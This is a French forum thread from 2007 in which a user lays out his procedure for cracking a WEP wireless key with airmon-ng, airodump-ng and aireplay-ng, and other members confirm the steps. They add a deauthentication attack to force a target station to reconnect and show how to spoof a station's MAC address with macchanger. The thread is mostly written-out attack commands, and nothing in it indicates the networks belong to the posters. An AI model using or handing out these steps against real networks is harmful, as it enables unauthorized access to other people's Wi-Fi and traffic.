est ce que ma procédure est correcte ? (Page 1) / Crack de clef wep / Forum d'entraide: tuto-fr.com

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 21-03-2007 12:08:50

Oz
Membre

est ce que ma procédure est correcte ?

Salut à tous !!

Ca fait pas mal de temps (1mois) que j'essaie de cracker une clef WEP avec toutes les infos sur ce site et pourtant je n'y suis pas encore arrivé.

Voici la procédure que je fais pour cracker la clef WEP:
1) lancer la carte WIFI en mode monitor.
-----------------------------------------------
  airmon-ng start wifi0

2) lancer la capture (ecoute des réseaux) pour choper les BSSID, les stations, ESSID
--------------------------------------------------------------------------------------------------
  airodump-ng -w NOM_DU_FICHIER_DE_SORTIE (--channel XX)(si on connait le channel) ath1

Remarques: je ne mets pas --ivs car sinon je n'arrive pas avec aireplay-ng a effectuer des injections de paquets

3) lancer aireplay-ng pour effectuer une fausse identhification
-----------------------------------------------------------------------
aireplay -1 0 -e NOM_POINT_D_ACCES - a BSSID - b BSSID -h la station

4) lancer aireplay-ng pour une injection de paquet
----------------------------------------------------------
aireplay -3 -e NOM_POINT_D_ACCES - a BSSID - b BSSID -h la station -x 500 -r NOM_DU_FICHIER_DE_SORTIE.cap ath1

Est ce correct ?

J'ai plusieurs questions :
----------------------------

Pourquoi je suis obligé de faire : ...... -r NOM_DU_FICHIER_DE_SORTIE.cap... pour que ca marche l'injection de paquets ?

J'ai essayé sans le -r NOM_DU_FICHIER_DE_SORTIE et ca ne marche pas du tout l'injection de paquet !!!

Comment faire pour changer son adresse mac ??

J'ai beau faire airmon-ng stop ath1

puis ifconfig ath1 hw ether xx :xx :xx :xx :xx :xx

ca plante impossible de changer l'adresse (J'ai une message d'erreur que je n'ai pas noté...)

Comment faites vous ?

je suis sous BackTrackV2 finale, ma carte est une PCI TP-link TL-WN651G, chipset Atheros.

Ca m'aiderais bcp !!!

Merci à tous.

Oz

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 21-03-2007 16:30:28

Oz
Membre

Re : est ce que ma procédure est correcte ?

Personne pour me dire si ma méthode est correcte ?

Ca me surprend...

Oz

#3 21-03-2007 16:38:30

wxcvbn
Membre d'honneur

Non tout est bon; moi j'enleve le -r nom du fichier .cap car j'ai la flemme de tout taper...lol

Tout ce que je peux te dire c'est que c'est très rare que ça demarre instantanement l'injection (-3), à chaque fois j'ai du relancer plusieurs fois; et souvent ça ne demarre qu'au bout de 15-20 minutes...
Chaque AP dont j'ai voulu trouver la clé je n'ai jamais reussi du 1er coup mais c'est genre 1 semaine plus atrd alors que je fais la meme chose que ça marche.

Donc continue mais quand tu le, fais insiste, n'essaye pas 10 minutes puis après tu laisse tomber pour retourner sous windows...

#4 21-03-2007 16:38:44

charly5942
Membre d'honneur
Lieu : Lille

Allez j'y vais.
Pas besoin de changer ton adresse MAC, BT2 va le faire tout seul
-r NOM_DU_FICHIER_DE_SORTIE.cap  n'est pas obligatoire, je le mets jamais perso. Pour avoir des ARP, il faur que la station se connecte c'est à ce moment là que des ARP sont échangés donc soit tu déconnecte manuellement la station cible, soit tu la déconnecte avec une attaque aireplay-ng -0

Utilise bien --channel XX pour bien focaliser ta carte sur la canal qui t'interesse.

Sinon tout le reste est bon.

Matos: TP-Link TL-WN660G (chipset AR5005GS); Linksys WUSB54G V4; Atheros AR5005G
Dual boot XP / BT3 BETA
Tout message privé (MP) non sollicité sera immédiatement poubellisé sans être lu et par conséquent n'apportera aucune réponse !!! :-)

#5 21-03-2007 16:46:21

Oz
Membre

Un GRAND Merci aux 2 bonnes âmes qui ont m'ont répondu !!!

Pour info, lorsque je teste, en règle générale je fais ça de 20h à 22h30.

la j'ai laissé mon Pc en route depuis ce matin pour voir si il chope des ARP sans le -r NOM_DU_FICHIER_DE_SORTIE.cap. Je vais voir ce que cela donne.

Merci en tout cas.

Oz

#6 21-03-2007 17:39:06

Rigoletto
Membre

En ce qui me concerne l'injection de paquets ne fonctionnait pas tant que je n'avais pas changé l'adresse MAC de ma carte par celle de la station, procédure:

macchanger --mac=MAC_de_la_STATION wlan0       (où wlan0 est ma carte wifi)

Si ça peut t'aider...

Intel 2200b/g - OvisLink Evo-W54USB (Ralink) - Alpha AWUS036H (Realtek)
Asus WL500g Deluxe (DD-WRT mode Repeater)
Buffalo WHR-HP-G54 (DD-WRT mode Client)

#7 21-03-2007 20:46:27

Oz
Membre

Rigoletto a écrit :

En ce qui me concerne l'injection de paquets ne fonctionnait pas tant que je n'avais pas changé l'adresse MAC de ma carte par celle de la station, procédure:

macchanger --mac=MAC_de_la_STATION wlan0       (où wlan0 est ma carte wifi)

Si ça peut t'aider...

Merci j'en prends note !!

Oz

Annonce